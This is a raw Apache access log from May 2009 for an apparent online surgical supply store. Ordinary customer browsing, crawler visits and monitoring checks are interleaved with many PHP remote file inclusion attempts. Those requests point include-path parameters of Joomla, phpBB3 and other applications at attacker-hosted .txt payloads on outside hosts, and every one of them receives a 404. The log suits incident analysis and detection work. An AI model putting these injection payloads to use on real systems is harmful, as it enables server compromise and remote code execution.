218.249.36.194 - - [07/May/2009:22:39:22 -0400] "GET /logs/access_log.Q108090100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [07/May/2009:22:39:30 -0400] "GET /logs/access_log.Q109042500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.228.155.80 - - [07/May/2009:22:39:35 -0400] "GET /logs/access_log.Q108082800//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/v6id.txt%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
195.228.155.80 - - [07/May/2009:22:39:35 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/v6id.txt%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
195.228.155.80 - - [07/May/2009:22:39:35 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/v6id.txt%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
195.228.155.80 - - [07/May/2009:22:39:39 -0400] "GET /logs/access_log.Q108082900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/v6id.txt%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
218.249.36.194 - - [07/May/2009:22:39:53 -0400] "GET /logs/access_log.Q108090100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:39:53 -0400] "GET /logs/access_log.Q108100600//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:40:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.15.200 - - [07/May/2009:22:40:28 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.15.200 - - [07/May/2009:22:40:32 -0400] "GET /logs/access_log.Q108091600%20%20//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.34.37.16 - - [07/May/2009:22:40:51 -0400] "GET /logs/error_log.Q108022400//sb/index.php?sb_include_path=http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
203.34.37.16 - - [07/May/2009:22:40:52 -0400] "GET //sb/index.php?sb_include_path=http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
203.34.37.16 - - [07/May/2009:22:40:53 -0400] "GET /logs//sb/index.php?sb_include_path=http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
122.116.178.20 - - [07/May/2009:22:41:49 -0400] "GET /logs/access_log.Q108081700//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:41:53 -0400] "GET /logs/access_log.Q108081700//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:42:29 -0400] "GET /logs/access_log.Q109042500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:42:34 -0400] "GET /logs/access_log.Q109042500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:22:42:52 -0400] "GET /logs/error_log.Q108030500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:22:42:52 -0400] "GET /logs/access_log.Q109042500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.202.11.155 - - [07/May/2009:22:43:04 -0400] "GET /logs/access_log.Q107123100 HTTP/1.1" 404 224 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)"
72.55.164.230 - - [07/May/2009:22:43:37 -0400] "GET /logs/access_log.Q108082800//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.820"
72.55.164.230 - - [07/May/2009:22:43:37 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.820"
72.55.164.230 - - [07/May/2009:22:43:37 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.820"
66.197.202.64 - - [07/May/2009:22:43:50 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:43:54 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:43:57 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:44:03 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
96.254.94.248 - - [07/May/2009:22:44:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
222.239.76.25 - - [07/May/2009:22:44:14 -0400] "GET /logs/access_log.Q109042500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:22:44:14 -0400] "GET /logs/error_log.Q108030500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.12.197.20 - - [07/May/2009:22:44:17 -0400] "GET /logs/access_log.Q108082800/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
83.12.197.20 - - [07/May/2009:22:44:17 -0400] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
83.12.197.20 - - [07/May/2009:22:44:18 -0400] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
66.249.72.114 - - [07/May/2009:22:44:27 -0400] "GET /images/items/store_saws_section.jpg HTTP/1.1" 200 10028 "-" "Googlebot-Image/1.0"
66.249.72.114 - - [07/May/2009:22:44:47 -0400] "GET /logs/access_log.Q107071000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
96.254.94.248 - - [07/May/2009:22:44:15 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37788 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:40 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37788 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:47 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:47 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:48 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:48 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:48 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:48 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:48 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:48 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:49 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:49 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:49 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:49 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:49 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:49 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:50 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:51 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
96.254.94.248 - - [07/May/2009:22:44:51 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [07/May/2009:22:45:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.164.230 - - [07/May/2009:22:45:07 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.820"
72.55.164.230 - - [07/May/2009:22:45:11 -0400] "GET /logs/access_log.Q108082900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.820"
72.30.142.94 - - [07/May/2009:22:45:14 -0400] "GET /logs/error_log.Q109040700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
96.254.94.248 - - [07/May/2009:22:45:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1095904071B071007EDC04E+M37+ENG HTTP/1.1" 200 36149 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.12.197.20 - - [07/May/2009:22:45:28 -0400] "GET /logs/access_log.Q108082900/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
122.116.178.20 - - [07/May/2009:22:46:24 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:48:25 -0400] "GET /logs//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:48:25 -0400] "GET /logs/access_log.Q108122200//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:48:25 -0400] "GET //index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:48:25 -0400] "GET /logs/access_log.Q108090900//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
96.254.94.248 - - [07/May/2009:22:48:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L109590457340A1009DFC04E+M37+ENG HTTP/1.1" 200 35720 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095904071B071007EDC04E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
218.249.36.194 - - [07/May/2009:22:48:40 -0400] "GET //index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:48:40 -0400] "GET /logs/access_log.Q108122200//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:48:40 -0400] "GET /logs//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:48:40 -0400] "GET /logs/access_log.Q108090900//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
96.254.94.248 - - [07/May/2009:22:48:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L109591457E40C100496C04E+M37+ENG HTTP/1.1" 200 34512 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L109590457340A1009DFC04E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
123.214.171.106 - - [07/May/2009:22:49:13 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
123.214.171.106 - - [07/May/2009:22:49:13 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
123.214.171.106 - - [07/May/2009:22:49:13 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
123.214.171.106 - - [07/May/2009:22:49:45 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
122.153.212.195 - - [07/May/2009:22:49:57 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:49:57 -0400] "GET /logs/access_log.Q109021900/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:49:57 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:50:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [07/May/2009:22:50:08 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:50:08 -0400] "GET /logs/access_log.Q109021900/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:50:08 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
